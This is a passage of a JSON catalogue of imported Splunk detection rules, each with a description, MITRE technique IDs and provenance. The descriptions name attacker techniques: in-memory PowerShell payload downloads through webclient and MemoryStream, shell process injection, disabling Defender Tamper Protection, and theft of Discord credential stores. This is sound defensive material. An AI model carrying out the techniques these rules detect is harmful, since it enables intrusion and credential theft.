"detection", "name": "Create Remote Thread In Shell Application", "description": "The following analytic detects suspicious process injection in command shell applications, specifically targeting `cmd.exe` and `powershell.exe`. 
It leverages Sysmon EventCode 8 to identify the creation of remote threads within these shell processes. This activity is significant because it is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe threat to system security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/create-remote-thread-in-shell-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10399c1e-f51e-11eb-b920-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/create_remote_thread_in_shell_application.yml" } }, { "id": "splunk-security-content-103affa6-924a-4b53-aff4-1d5075342aab", "type": "detection", "name": "PowerShell WebRequest Using Memory Stream", "description": "The following analytic detects the use of .NET classes in PowerShell to download a URL payload directly into memory, a common fileless malware staging technique. It leverages PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell commands involving `system.net.webclient`, `system.net.webrequest`, and `IO.MemoryStream`. This activity is significant as it indicates potential fileless malware execution, which is harder to detect and can bypass traditional file-based defenses. 
If confirmed malicious, this technique could allow attackers to execute code in memory, evade detection, and maintain persistence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105", "T1027.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-webrequest-using-memory-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "103affa6-924a-4b53-aff4-1d5075342aab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_webrequest_using_memory_stream.yml" } }, { "id": "splunk-security-content-10423ac4-10c9-11ec-8dc4-acde48001122", "type": "detection", "name": "Control Loading from World Writable Directory", "description": "The following analytic identifies instances of control.exe loading a .cpl or .inf file from a writable directory, which is related to CVE-2021-40444. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions mapped to the `Processes` node of the `Endpoint` data model. This activity is significant as it may indicate an attempt to exploit a known vulnerability, potentially leading to unauthorized code execution. 
If confirmed malicious, this could allow an attacker to gain control over the affected system, leading to further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/control-loading-from-world-writable-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10423ac4-10c9-11ec-8dc4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/control_loading_from_world_writable_directory.yml" } }, { "id": "splunk-security-content-10442d8b-0701-4c25-911d-d67b906e713c", "type": "detection", "name": "Kubernetes Anomalous Inbound Network Activity from Process", "description": "The following analytic identifies anomalous inbound network traffic volumes from processes within containerized workloads. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. The detection compares recent metrics (tcp.bytes, tcp.new_sockets, tcp.packets, udp.bytes, udp.packets) over the last hour with the average over the past 30 days. This activity is significant as it may indicate unauthorized data reception, potential breaches, vulnerability exploitation, or malware propagation. 
If confirmed malicious, it could lead to command and control installation, data integrity damage, container escape, and further environment compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-anomalous-inbound-network-activity-from-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10442d8b-0701-4c25-911d-d67b906e713c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_anomalous_inbound_network_activity_from_process.yml" } }, { "id": "splunk-security-content-104658f4-afdc-499e-9719-17243f982681", "type": "detection", "name": "Detect attackers scanning for vulnerable JBoss servers", "description": "The following analytic identifies specific GET or HEAD requests to web servers that indicate reconnaissance attempts to find vulnerable JBoss servers. It leverages data from the Web data model, focusing on HTTP methods and URLs associated with JBoss management interfaces. This activity is significant because it often precedes exploitation attempts using tools like JexBoss, which can compromise the server. 
If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, or escalate privileges, leading to potential data breaches and system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-attackers-scanning-for-vulnerable-jboss-servers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "104658f4-afdc-499e-9719-17243f982681", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_attackers_scanning_for_vulnerable_jboss_servers.yml" } }, { "id": "splunk-security-content-104658f4-afdc-499e-9719-17243f9826f1", "type": "detection", "name": "Excessive DNS Failures", "description": "The following analytic identifies excessive DNS query failures by counting DNS responses that do not indicate success, triggering when there are more than 50 occurrences. It leverages the Network_Resolution data model, focusing on DNS reply codes that signify errors. This activity is significant because a high number of DNS failures can indicate potential network misconfigurations, DNS poisoning attempts, or malware communication issues. 
If confirmed malicious, this activity could lead to disrupted network services, hindered communication, or data exfiltration attempts by attackers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-dns-failures.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "104658f4-afdc-499e-9719-17243f9826f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/excessive_dns_failures.yml" } }, { "id": "splunk-security-content-105e4a69-ec55-49fc-be1f-902467435ea8", "type": "detection", "name": "Cisco AI Defense Security Alerts by Application Name", "description": "The search surfaces alerts from the Cisco AI Defense product for potential attacks against the AI models running in your environment. This analytic identifies security events within Cisco AI Defense by examining event messages, actions, and policy names. It focuses on connections and applications associated with specific guardrail entities and ruleset types. 
By aggregating and analyzing these elements, the search helps detect potential policy violations and security threats, enabling proactive defense measures and ensuring network integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-ai-defense-security-alerts-by-application-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "105e4a69-ec55-49fc-be1f-902467435ea8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_ai_defense_security_alerts_by_application_name.yml" } }, { "id": "splunk-security-content-10ca081c-57b1-4a78-ba56-14a40a7e116a", "type": "detection", "name": "Windows Impair Defense Overide Win Defender Phishing Filter", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender phishing filter. It leverages data from the Endpoint.Registry data model, focusing on changes to specific registry values related to Microsoft Edge's phishing filter settings. This activity is significant because disabling the phishing filter can allow attackers to deceive users into visiting malicious websites without triggering browser warnings. 
If confirmed malicious, this could lead to users unknowingly accessing harmful sites, resulting in potential security incidents or data compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-overide-win-defender-phishing-filter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10ca081c-57b1-4a78-ba56-14a40a7e116a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_overide_win_defender_phishing_filter.yml" } }, { "id": "splunk-security-content-10d62950-0de5-4199-a710-cff9ea79b413", "type": "detection", "name": "Elevated Group Discovery with PowerView", "description": "The following analytic detects the execution of the `Get-DomainGroupMember` cmdlet from PowerView, identified through PowerShell Script Block Logging (EventCode=4104). This cmdlet is used to enumerate members of elevated domain groups such as Domain Admins and Enterprise Admins. Monitoring this activity is crucial as it indicates potential reconnaissance efforts by adversaries to identify high-privileged users within the domain. 
If confirmed malicious, this activity could lead to targeted attacks on privileged accounts, facilitating further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/elevated-group-discovery-with-powerview.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10d62950-0de5-4199-a710-cff9ea79b413", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/elevated_group_discovery_with_powerview.yml" } }, { "id": "splunk-security-content-10ec9031-015b-4617-b453-c0c1ab729007", "type": "detection", "name": "Azure AD OAuth Application Consent Granted By User", "description": "The following analytic detects when a user in an Azure AD environment grants consent to an OAuth application. It leverages Azure AD audit logs to identify events where users approve application consents. This activity is significant as it can expose organizational data to third-party applications, a common tactic used by malicious actors to gain unauthorized access. If confirmed malicious, this could lead to unauthorized access to sensitive information and resources. 
Immediate investigation is required to validate the application's legitimacy, review permissions, and mitigate potential risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-oauth-application-consent-granted-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10ec9031-015b-4617-b453-c0c1ab729007", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_oauth_application_consent_granted_by_user.yml" } }, { "id": "splunk-security-content-10f2bae0-bbe6-4984-808c-37dc1c67980d", "type": "detection", "name": "Detect Baron Samedit CVE-2021-3156 Segfault", "description": "The following analytic identifies a heap-based buffer overflow in sudoedit by detecting Linux logs containing both \"sudoedit\" and \"segfault\" terms. This detection leverages Splunk to monitor for more than five occurrences of these terms on a single host within a specified timeframe. This activity is significant because exploiting this vulnerability (CVE-2021-3156) can allow attackers to gain root privileges, leading to potential system compromise, unauthorized access, and data breaches. 
If confirmed malicious, this could result in elevated privileges and full control over the affected system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-baron-samedit-cve-2021-3156-segfault.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "10f2bae0-bbe6-4984-808c-37dc1c67980d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_baron_samedit_cve_2021_3156_segfault.yml" } }, { "id": "splunk-security-content-1120a204-8444-428b-8657-6ea4e1f3e840", "type": "detection", "name": "Windows Unusual NTLM Authentication Users By Destination", "description": "The following analytic detects when a device is the target of numerous NTLM authentications using a null domain. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to a domain joined Windows device from a non-domain device. 
This activity may also generate a large number of EventID 4776 events in tandem; however, these events will not indicate the attacker or target device.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-ntlm-authentication-users-by-destination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1120a204-8444-428b-8657-6ea4e1f3e840", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_ntlm_authentication_users_by_destination.yml" } }, { "id": "splunk-security-content-112638b4-4634-11ec-b9ab-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WMI and PowerShell", "description": "The following analytic detects the execution of `powershell.exe` using the `Invoke-WmiMethod` cmdlet to start a process on a remote endpoint via WMI. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process telemetry. This activity is significant as it indicates potential lateral movement or remote code execution attempts by adversaries. 
If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-wmi-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "112638b4-4634-11ec-b9ab-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_wmi_and_powershell.yml" } }, { "id": "splunk-security-content-114c616b-c793-465d-a80d-758c9fe8a704", "type": "detection", "name": "Cisco Duo Policy Allow Devices Without Screen Lock", "description": "The following analytic detects when a Duo policy is created or updated to allow devices without a screen lock requirement. It identifies this behavior by searching Duo administrator activity logs for policy creation or update events where the 'require_lock' setting is set to false. This action may indicate a weakening of device security controls, potentially exposing the organization to unauthorized access if devices are lost or stolen. For a Security Operations Center (SOC), identifying such policy changes is critical, as attackers or malicious insiders may attempt to lower authentication standards to facilitate unauthorized access. 
The impact of this attack could include increased risk of credential compromise, data breaches, or lateral movement within the environment due to reduced device security requirements.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-devices-without-screen-lock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "114c616b-c793-465d-a80d-758c9fe8a704", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_devices_without_screen_lock.yml" } }, { "id": "splunk-security-content-114c6bfe-9406-11ec-bcce-acde48001122", "type": "detection", "name": "Disabled Kerberos Pre-Authentication Discovery With Get-ADUser", "description": "The following analytic detects the execution of the `Get-ADUser` PowerShell cmdlet with parameters indicating a search for domain accounts with Kerberos Pre-Authentication disabled. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this specific activity. This behavior is significant because discovering accounts with Kerberos Pre-Authentication disabled can allow adversaries to perform offline password cracking. 
If confirmed malicious, this activity could lead to unauthorized access to user accounts, potentially compromising sensitive information and escalating privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabled-kerberos-pre-authentication-discovery-with-get-aduser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "114c6bfe-9406-11ec-bcce-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabled_kerberos_pre_authentication_discovery_with_get_aduser.yml" } }, { "id": "splunk-security-content-1155e47d-307f-4247-beab-71071e3a458c", "type": "detection", "name": "Windows AD SID History Attribute Modified", "description": "The following analytic detects modifications to the SID History attribute in Active Directory by leveraging event code 5136. This detection uses logs from the `wineventlog_security` data source to identify changes to the sIDHistory attribute. Monitoring this activity is crucial as the SID History attribute can be exploited by adversaries to inherit permissions from other accounts, potentially granting unauthorized access. 
If confirmed malicious, this activity could allow attackers to maintain persistent access and escalate privileges within the domain, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-sid-history-attribute-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1155e47d-307f-4247-beab-71071e3a458c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_sid_history_attribute_modified.yml" } }, { "id": "splunk-security-content-115bebac-0976-4f7d-a3ec-d1fb45a39a11", "type": "detection", "name": "Confluence Data Center and Server Privilege Escalation", "description": "The following analytic identifies potential exploitation attempts on a known vulnerability in Atlassian Confluence, specifically targeting the /setup/*.action* URL pattern. It leverages web logs within the Splunk 'Web' Data Model, filtering for successful accesses (HTTP status 200) to these endpoints. This activity is significant as it suggests attackers might be exploiting a privilege escalation flaw in Confluence. 
If confirmed malicious, it could result in unauthorized access or account creation with escalated privileges, leading to potential data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/confluence-data-center-and-server-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "115bebac-0976-4f7d-a3ec-d1fb45a39a11", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/confluence_data_center_and_server_privilege_escalation.yml" } }, { "id": "splunk-security-content-1166360c-d495-45ac-87a6-8948aac1fa07", "type": "detection", "name": "Windows Non Discord App Access Discord LevelDB", "description": "The following analytic detects non-Discord applications accessing the Discord LevelDB database. It leverages Windows Security Event logs, specifically event code 4663, to identify file access attempts to the LevelDB directory by processes other than Discord. This activity is significant as it may indicate attempts to steal Discord credentials or access sensitive user data. 
If confirmed malicious, this could lead to unauthorized access to user profiles, messages, and other critical information, potentially compromising the security and privacy of the affected users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-non-discord-app-access-discord-leveldb.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1166360c-d495-45ac-87a6-8948aac1fa07", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_non_discord_app_access_discord_leveldb.yml" } }, { "id": "splunk-security-content-116e11a9-63ea-41eb-a66a-6a13bdc7d2c7", "type": "detection", "name": "Azure AD Multi-Source Failed Authentications Spike", "description": "The following analytic detects potential distributed password spraying attacks in an Azure AD environment. It identifies a spike in failed authentication attempts across various user-and-IP combinations from multiple source IPs and countries, using different user agents. This detection leverages Azure AD SignInLogs, focusing on error code 50126 for failed authentications. This activity is significant as it indicates an adversary's attempt to bypass security controls by distributing login attempts. 
If confirmed malicious, this could lead to unauthorized access, data breaches, privilege escalation, and lateral movement within the organization's infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multi-source-failed-authentications-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "116e11a9-63ea-41eb-a66a-6a13bdc7d2c7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multi_source_failed_authentications_spike.yml" } }, { "id": "splunk-security-content-11ebb7c2-46bd-41c9-81e1-d0b4b34583a2", "type": "detection", "name": "O365 Email Transport Rule Changed", "description": "The following analytic identifies when a user with sufficient access to Exchange Online alters the mail flow/transport rule configuration of the organization. 
Transport rules are a set of rules that can be used by attackers to modify or delete emails based on specific conditions; this activity could indicate an attacker hiding or exfiltrating data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003", "T1564.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-transport-rule-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "11ebb7c2-46bd-41c9-81e1-d0b4b34583a2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_transport_rule_changed.yml" } }, { "id": "splunk-security-content-11ed764f-eb9c-4be7-bdad-2209b9d33ee1", "type": "detection", "name": "Windows Modify Registry Disable RDP", "description": "This analytic is developed to detect suspicious registry modifications that disable Remote Desktop Protocol (RDP) by altering the \"fDenyTSConnections\" key. Changing this key's value to 1 prevents remote connections, which can disrupt remote management and access. 
Such modifications could indicate an attempt to hinder remote administration or isolate the system from remote intervention, potentially signifying malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-rdp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "11ed764f-eb9c-4be7-bdad-2209b9d33ee1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_rdp.yml" } }, { "id": "splunk-security-content-11f93009-8083-43fd-82a7-821fcbdc8342", "type": "detection", "name": "Windows Set Account Password Policy To Unlimited Via Net", "description": "The following analytic detects the use of net.exe to update user account policies to set passwords as non-expiring. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"/maxpwage:unlimited\" or \"/maxpwage:49710\", which achieve a similar outcome theoretically. This activity is significant as it can indicate an attempt to maintain persistence, escalate privileges, evade defenses, or facilitate lateral movement. 
If confirmed malicious, this behavior could allow an attacker to maintain long-term access to compromised accounts, potentially leading to further exploitation and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-set-account-password-policy-to-unlimited-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "11f93009-8083-43fd-82a7-821fcbdc8342", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_set_account_password_policy_to_unlimited_via_net.yml" } }, { "id": "splunk-security-content-12094335-88fc-4c3a-b55f-e62dd8c93c23", "type": "detection", "name": "Windows Modify Registry Tamper Protection", "description": "The following analytic detects a suspicious modification to the Windows Defender Tamper Protection registry setting. It leverages data from the Endpoint datamodel, specifically targeting changes where the registry path is set to disable Tamper Protection. This activity is significant because disabling Tamper Protection can allow adversaries to make further undetected changes to Windows Defender settings, potentially leading to reduced security on the system. 
If confirmed malicious, this could enable attackers to evade detection, persist in the environment, and execute further malicious activities without interference from Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-tamper-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "12094335-88fc-4c3a-b55f-e62dd8c93c23", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_tamper_protection.yml" } }, { "id": "splunk-security-content-121b0b11-f8ac-4ed6-a132-3800ca4fc07a", "type": "detection", "name": "Detect AWS Console Login by User from New City", "description": "The following analytic identifies AWS console login events by users from a new city within the last hour. It leverages AWS CloudTrail events and compares them against a lookup file of previously seen user locations. This activity is significant for a SOC as it may indicate unauthorized access or credential compromise, especially if the login originates from an unusual location. 
If confirmed malicious, this could lead to unauthorized access to AWS resources, data exfiltration, or further exploitation within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1535", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-aws-console-login-by-user-from-new-city.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "121b0b11-f8ac-4ed6-a132-3800ca4fc07a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_aws_console_login_by_user_from_new_city.yml" } }, { "id": "splunk-security-content-12345678-abcd-1234-ef00-1234567890ab", "type": "detection", "name": "Cisco Isovalent - Shell Execution", "description": "The following analytic detects the execution of a shell inside a container namespace within the Cisco Isovalent environment. It identifies this activity by monitoring process execution logs for the execution of a shell (sh or bash) inside a container namespace. This 